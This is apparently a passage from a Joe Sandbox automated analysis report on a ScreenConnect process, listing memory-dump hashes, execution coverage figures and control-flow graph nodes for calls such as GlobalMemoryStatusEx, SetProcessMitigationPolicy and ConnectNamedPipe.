                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0167a2a76c1c5ea89a21feb50714eae8a12635fe8434b1572bff1033312cc97b
                                                                  • Instruction ID: e8100d6ab54139280275e3ecbe09fc4907fca9a531f54c0be55093cf91cfacb7
                                                                  • Opcode Fuzzy Hash: 0167a2a76c1c5ea89a21feb50714eae8a12635fe8434b1572bff1033312cc97b
                                                                  • Instruction Fuzzy Hash: 3EF02B1391EB951FE306637C68690E92FD0AE861B470901F3F449CB0D3EC0D6C8582E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3e20322bfa4186e39173b06c4ce26ec89306421c2472d42f1ab3fcb3b6b10f60
                                                                  • Instruction ID: b4d426b1989428dd6ecc14b9f90155a707c7b06acfad8de54eba3cb0501e87de
                                                                  • Opcode Fuzzy Hash: 3e20322bfa4186e39173b06c4ce26ec89306421c2472d42f1ab3fcb3b6b10f60
                                                                  • Instruction Fuzzy Hash: F6E0121295EB991ED34672791A550A82B90E9951D1B4E00F3E449CA093EC4D19D683E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1b47fef1a643805fccc8ea0ceea85e77a68464b749897d408c5ae85e785d95ca
                                                                  • Instruction ID: def7c27ef0e00dafb3788993da8ff2726a3c997ac83e8efaadb3d07ebeefc97f
                                                                  • Opcode Fuzzy Hash: 1b47fef1a643805fccc8ea0ceea85e77a68464b749897d408c5ae85e785d95ca
                                                                  • Instruction Fuzzy Hash: 8FE0D120509B460FD74A573484598F13FF0FF5521179900DBD845CF0A3F91D99C5C781
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7a8c8703dfa9defc1ebdbc1515c6f09c73e2c6c5c0a72361d49c8f5ab8c5d439
                                                                  • Instruction ID: fe22a24b6b30aee01da49d3f880debfdb976045126c93891f7435823be60aad2
                                                                  • Opcode Fuzzy Hash: 7a8c8703dfa9defc1ebdbc1515c6f09c73e2c6c5c0a72361d49c8f5ab8c5d439
                                                                  • Instruction Fuzzy Hash: 85F06D3144965C9FCB42EB64E494CD6BFB0EF06314B0101CBE099CB052E7219A99CBC2
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8921102160f8f0bb8b4e1ba36c0fe0034a8433e5db5121ec47b34cc5d78184f1
                                                                  • Instruction ID: d6cfe0061ee1288485dce85c183bf2d087562f1fd719927016756666fd623b55
                                                                  • Opcode Fuzzy Hash: 8921102160f8f0bb8b4e1ba36c0fe0034a8433e5db5121ec47b34cc5d78184f1
                                                                  • Instruction Fuzzy Hash: FDE0ED3680881D8FCB11EA48E8158D9B7A0FF153A0B0000A3E00EC7052EA22AD59CBC1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e81a45c8a5a5eec17e0e276b8f8289bf57dbdf74f3cb831828dfe9db09a1fa86
                                                                  • Instruction ID: 7436cb6b17267ab697e220e7a6de8162b062334cf996088883e0ed6d51b36ea7
                                                                  • Opcode Fuzzy Hash: e81a45c8a5a5eec17e0e276b8f8289bf57dbdf74f3cb831828dfe9db09a1fa86
                                                                  • Instruction Fuzzy Hash: 66D02213A26D2D1AE688B33D2A4E8FC00C1EAC82E2B8900B2FC0DC7186EC1C1DC143D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cdb6711a624d8a01258318c983b67ccc459f819a6aa0e651c3653d789a7e9d14
                                                                  • Instruction ID: aef0ae1b54010f89158c61bf51c28af89c051328914b1c5feef0e3053bdb068c
                                                                  • Opcode Fuzzy Hash: cdb6711a624d8a01258318c983b67ccc459f819a6aa0e651c3653d789a7e9d14
                                                                  • Instruction Fuzzy Hash: AFE04F50D1DA86CAF658EA714C97AB96691BF44290F444879E08F8B0E6CC297D08D280
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f62da93da4451c7ba9604d9725c25c3b23504e69cdc4d69838133fe78ecfc84e
                                                                  • Instruction ID: 1abbf631816fe1a9a614af9cbf00444b56e98bce1a4b4c7e0c244cdd599ba2ce
                                                                  • Opcode Fuzzy Hash: f62da93da4451c7ba9604d9725c25c3b23504e69cdc4d69838133fe78ecfc84e
                                                                  • Instruction Fuzzy Hash: 1AD09E01F4DC6D4AA9D5A95D34951F842C2E7D8690F6444B2E40EC279DDD096C968385
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b2c282651cb4181941a9eb4991dd8cbd6b9ef55b205d6a5c859f6d86cda10b04
                                                                  • Instruction ID: cca505aa8ffca124196f01bba96d94bdd38b812213d4b1f0b00e7ec8cacc205f
                                                                  • Opcode Fuzzy Hash: b2c282651cb4181941a9eb4991dd8cbd6b9ef55b205d6a5c859f6d86cda10b04
                                                                  • Instruction Fuzzy Hash: 0FC09220E0891A8AF285FB75844F6BE21937F88280B949434E00E8A1CBCE3DBE02D241
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2694117296.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff886d60000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: edecf9a474e5d843b6a2d9eab792522cbf0150a06fbf24326a774abf6e844b99
                                                                  • Instruction ID: 8ad1f82a6d19e2785c0d7b5e444ae197017ad5f1c31e2ea1ea315255ceae5e5e
                                                                  • Opcode Fuzzy Hash: edecf9a474e5d843b6a2d9eab792522cbf0150a06fbf24326a774abf6e844b99
                                                                  • Instruction Fuzzy Hash: 03A00200E4C92686A091B154400B57E10562F45680A255135E10E861DBCF1DBE429286

                                                                  Execution Graph

                                                                  Execution Coverage:11.3%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:13
                                                                  Total number of Limit Nodes:2
                                                                  execution_graph 15993 7ff886d88874 15997 7ff886d8887d 15993->15997 15994 7ff886d88972 15995 7ff886d88a19 GlobalMemoryStatusEx 15996 7ff886d88a45 15995->15996 15997->15994 15997->15995 15988 7ff886a77fc4 15990 7ff886a77fcd 15988->15990 15989 7ff886a78032 15990->15989 15991 7ff886a780a6 SetProcessMitigationPolicy 15990->15991 15992 7ff886a78102 15991->15992 15998 7ff886a73602 15999 7ff886a96520 ConnectNamedPipe 15998->15999 16001 7ff886a965d2 15999->16001

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 63 7ff886d88874-7ff886d8887b 64 7ff886d88886-7ff886d888ea 63->64 65 7ff886d8887d-7ff886d88885 63->65 70 7ff886d88934-7ff886d88941 64->70 71 7ff886d888ec-7ff886d88915 64->71 65->64 75 7ff886d88942-7ff886d88947 70->75 73 7ff886d88917-7ff886d8891a 71->73 74 7ff886d8896e 71->74 76 7ff886d8899b-7ff886d8899f 73->76 77 7ff886d8891c-7ff886d8891e 73->77 78 7ff886d8896f 74->78 79 7ff886d889b8-7ff886d889ba 75->79 80 7ff886d88949-7ff886d8894d 75->80 100 7ff886d889a0 76->100 81 7ff886d88920 77->81 82 7ff886d8899a 77->82 83 7ff886d88970 78->83 84 7ff886d889eb-7ff886d889ed 78->84 79->75 87 7ff886d889bc-7ff886d889cc 79->87 88 7ff886d889ce-7ff886d889cf 80->88 89 7ff886d8894f-7ff886d88951 80->89 91 7ff886d88922-7ff886d88924 81->91 92 7ff886d88963 81->92 82->76 85 7ff886d889f1-7ff886d88a17 83->85 86 7ff886d88971 83->86 84->85 99 7ff886d88a19-7ff886d88a43 GlobalMemoryStatusEx 85->99 93 7ff886d88972-7ff886d88999 86->93 94 7ff886d889b3-7ff886d889b7 86->94 97 7ff886d889cd 87->97 98 7ff886d889d0-7ff886d889d1 88->98 88->99 96 7ff886d88953-7ff886d88957 89->96 89->97 91->100 103 7ff886d88926 91->103 101 7ff886d88965 92->101 102 7ff886d889df-7ff886d889e3 92->102 93->82 94->79 107 7ff886d889d3-7ff886d889d8 96->107 108 7ff886d88959 96->108 97->88 98->107 105 7ff886d88a45 99->105 106 7ff886d88a4b-7ff886d88a72 99->106 109 7ff886d88966-7ff886d88967 101->109 110 7ff886d889a7-7ff886d889a9 101->110 111 7ff886d889e5-7ff886d889ea 102->111 112 7ff886d88928-7ff886d8892a 103->112 113 7ff886d88969 103->113 105->106 116 7ff886d889d9-7ff886d889de 107->116 108->76 115 7ff886d8895b-7ff886d8895d 108->115 109->113 117 7ff886d889ab-7ff886d889ae 110->117 118 7ff886d889af 110->118 111->84 120 7ff886d889a6 112->120 121 7ff886d8892c 112->121 113->111 119 7ff886d8896b-7ff886d8896d 113->119 115->116 122 7ff886d8895f-7ff886d88961 115->122 116->102 117->118 123 7ff886d889b1 118->123 124 7ff886d889b2 118->124 119->74 120->110 121->78 125 7ff886d8892e-7ff886d88931 121->125 122->92 123->124 124->94 125->70
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1570332242.00007FF886D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ff886d80000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID:
                                                                  • API String ID: 1890195054-0
                                                                  • Opcode ID: a5c38658cfc50d43e62668c10bd30e1a3f67b9b74e18c903296adc064c877ca0
                                                                  • Instruction ID: 71c0dd3f084a3ef62d15dc3645d51da48b94f0c56a372b58d468638f39e14992
                                                                  • Opcode Fuzzy Hash: a5c38658cfc50d43e62668c10bd30e1a3f67b9b74e18c903296adc064c877ca0
                                                                  • Instruction Fuzzy Hash: DE812B3180D6994FE775D76888196A97FE0FF56360F0442BAD04EDB5D3DA196C09C382

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1563625194.00007FF886A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886A70000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ff886a70000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: MitigationPolicyProcess
                                                                  • String ID:
                                                                  • API String ID: 1088084561-0
                                                                  • Opcode ID: 06af46e82c38ae00ce7658817c62e8dcdf2ba88c86f7311524f2024216fe5c01
                                                                  • Instruction ID: 9cd87f454773dfd3517d6dd3ca7f27b559b3dabdb2be373eefcfaf606d5253a6
                                                                  • Opcode Fuzzy Hash: 06af46e82c38ae00ce7658817c62e8dcdf2ba88c86f7311524f2024216fe5c01
                                                                  • Instruction Fuzzy Hash: AE412731D0CB484FDB15ABA89C4A5F97BE0EF56361F0441BFE089C7192DE68A846C792

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 144 7ff886a73602-7ff886a965d0 ConnectNamedPipe 148 7ff886a965d2 144->148 149 7ff886a965d8-7ff886a96620 call 7ff886a96621 144->149 148->149
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1563625194.00007FF886A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886A70000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ff886a70000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: ConnectNamedPipe
                                                                  • String ID:
                                                                  • API String ID: 2191148154-0
                                                                  • Opcode ID: 916578c1ac6e2ab29802dd5a7fd3875bb9ca8450fa6049cf5dd45dc57941d396
                                                                  • Instruction ID: d50f5acb58c0ecb9e53f385331f430599d941b2371091c690000e4b8827b0e04
                                                                  • Opcode Fuzzy Hash: 916578c1ac6e2ab29802dd5a7fd3875bb9ca8450fa6049cf5dd45dc57941d396
                                                                  • Instruction Fuzzy Hash: 03316D70908A1C8FEB58EF98D849BEDB7F1FB58311F10826AD04DE7256DB74A845CB81

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 153 7ff886a73a42-7ff886a7809f 155 7ff886a780a6-7ff886a78100 SetProcessMitigationPolicy 153->155 156 7ff886a78108-7ff886a78137 155->156 157 7ff886a78102 155->157 157->156
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.1563625194.00007FF886A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886A70000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ff886a70000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: MitigationPolicyProcess
                                                                  • String ID:
                                                                  • API String ID: 1088084561-0
                                                                  • Opcode ID: 743b72e56c7cbe81c76f1999ee4e799979a9f09b5cd61dd551f46c94c5c1861a
                                                                  • Instruction ID: ff7c8731191cbd78355b79ff7a487353d64c3ab1c4122014d231857b9c24c76e
                                                                  • Opcode Fuzzy Hash: 743b72e56c7cbe81c76f1999ee4e799979a9f09b5cd61dd551f46c94c5c1861a
                                                                  • Instruction Fuzzy Hash: 3321A73191CB188FDB28AF9DDC4A6F977E0EB55711F00413EE049D3251DB74B8458B91